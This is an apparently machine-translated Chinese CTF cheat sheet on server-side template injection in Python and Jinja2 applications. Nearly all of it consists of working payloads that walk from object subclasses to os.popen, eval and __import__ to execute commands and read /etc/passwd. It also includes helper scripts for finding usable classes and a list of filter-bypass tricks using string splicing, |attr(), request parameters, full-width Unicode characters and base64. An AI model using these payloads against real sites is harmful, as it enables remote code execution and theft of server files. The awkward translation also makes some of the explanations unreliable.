summary SSTI Topic flow ( With python3 For example )

The subscript of the class will be because python Different versions (python2,python3) And different

1. find object class , adopt __mro__ or __bases__ Come looking for

 // The index needs to be modified for different websites , Until the returned class is object
''.__class__.__mro__[1]
{}.__class__.__bases__[0]
().__class__.__bases__[0]
[].__class__.__bases__[0]
request.__class__.__mro__[11]

as follows ： 

2. see object Subclasses of classes , adopt .__subclasses__()

The subcategories in different topics are different , Some will be banned , Through the following payload See what works

''.__class__.__mro__[1].__subclasses__()
{}.__class__.__bases__[0].__subclasses__()
().__class__.__bases__[0].__subclasses__()
[].__class__.__bases__[0].__subclasses__()

3. Find functions that can be used through subclasses  

1.  File reading page 91 individual <class '_frozen_importlib_external.FileLoader'>

''.__class__.__mro__[1].__subclasses__()[91].get_data(0,' File path ')

2. Document reading and writing section 40 individual <class file>( If any )

# read 
''.__class__.__mro__[1].__subclasses__()[40](' File path ').read()
# Write 
''.__class__.__mro__[1].__subclasses__()[40](' File path ',' The way of writing ').write()

3. Command execution

Direct use of os.popen 

object The next 71 Classes  <class 'site._Printer'> 

{
   {''.__class__.__mro__[1].__subclasses__()[71].__init__.__globals__['os'].popen('whoami').read()}}

If there is no such class above, it will be a little troublesome , Need to pass through __import__ perhaps __builtins__ To implement command execution

practice ： Find out what can be achieved .__init__.__globals__ Class , And further find modules ： __import__ perhaps __builtins__

python The code is as follows ：

num = 0
str1=''
select=input(" Please select the search method :1.__builtins__;2.__import__;")

if select=='1' :
    str1="__builtins__"
if select=='2' :
    str1="__import__"

for item in ''.__class__.__mro__[1].__subclasses__():
    try:
        if str1 in item.__init__.__globals__:
            print(num,item)
            num+=1
    except:
        num+=1

  Or use this , Find in one step eval

count = -1
# for i in ''.class.mro[-1].subclasses():
for i in ''.__class__.__mro__[-1].__subclasses__():
    count += 1
    if "warpper" in repr(i.__init__):
        pass
    else:
        try:
            if "eval" in repr(i.__init__.__globals__['__builtins__']):
                print(count, i)
        except:
            pass

For example, it has __builtins__ Class

have builtins Words ： utilize eval

{
   {''.__class__.__mro__[1].__subclasses__()[75].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("whoami").read()')}}

utilize command( Some questions may prompt No command package , Then it won't work )

{
   {
   {}.__class__.__bases__[0].__subclasses__()[75].__init__.__globals__['__builtins__']['__import__']('commands').getstatusoutput('ls')}}

{
   {
   {}.__class__.__bases__[0].__subclasses__()[75].__init__.__globals__['__builtins__']['__import__']('os').system('whoami')}}

{
   {''.__class__.__mro__[1].__subclasses__()[71].__init__.__globals__['os'].popen('whoami').read()}}

have import Method

payload as follows ： 

{
   {"".__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__import__('os').popen('whoami').read()}}

   other

Jinja2 Created url_for() Method  

{
   {url_for.__globals__.os.popen("whoami").read()}}

adopt config, call os

{
   {config.__class__.__init__.__globals__['os'].popen('whoami').read()}}

The following are not necessarily ok  

{
   {''.__class__.__base__.__subclasses__()[169].__init__.__globals__['sys'].modules['os'].popen("whoami").read()}}

// os._wrap_close Class popen
{
   {"".__class__.__bases__[0].__subclasses__()[128].__init__.__globals__['popen']('whoami').read()}}

// __builtins__
{
   {"".__class__.__bases__[0].__subclasses__()[128].__init__.__globals__['popen']('whoami').read()}}

Summarize the command execution ：

1. find object class

2. Call related functions ：

Command execution ：os.system() , os.popen().read(),eval()

How to find ？ 1. adopt python Script to find

2. If a class does not os, But there are import, Can pass import Import os After the package passed os To carry out an order

3. The location of the class will be because python Different versions of , Just check the official website , Or you can find it step by step

As for how to look at the server python Version of ？->bp Grab the bag , Just look at the return package

  Various bypass methods （ Welcome to add ）

Method 1 Keywords are forbidden

By splicing strings

.__class__ -> ["__c""lass__"]

The dot is forbidden

1. adopt [] To replace the point

.__class__ -> [__class__]

 2. adopt |attr() Replace

.__class__ -> |attr("__class__")
 Such as 
request.__class__ -> request|attr("__class__")

Method 2 It's filtered out _ 

Bypass by passing parameters

Get Way to pass parameters

{
   {''.__class__}} => {
   {''[request.args.t1]}}?t1=__class__

Post Mode reference （ A two-step ）

{
   { ''[request.value.class][request.value.mro][2][request.value.subclasses]()[40]('/etc/passwd').read() }}

utilize hackbar Send a message on this page Post Data packets

class=__class__&mro=__mro__&subclasses=__subclasses__

Method 3 Filter quotes

It is also achieved by passing parameters

{
   {().__class__.__bases__.__getitem__(0).__subclasses__().pop(40)(request.args.path).read()}}&path=/etc/passwd

Method 4 Special characters bypass

A complete collection of symbols - Special symbols - A complete collection of special symbols (fhdq.net)

Directly on this ctrl+f Search for symbols of equivalent substitution , And then use it python Script to replace

"""
{ -> ︷/﹛
} -> ︸/﹜
' -> ＇
, -> ,
" -> ＂
"""
str='{
   {\'\'.__class__}}' # Original string 
# If you need to replace replace( Replaced characters , The replaced character )
str=str.replace('{','︷')
str=str.replace('}','︸')
str=str.replace('\'','＇')
str=str.replace('\"','＂')

print(str)

Method 5 Code bypass

[].__class__->[].__getattribute__('X19jbGFzc19f'.decode('base64'))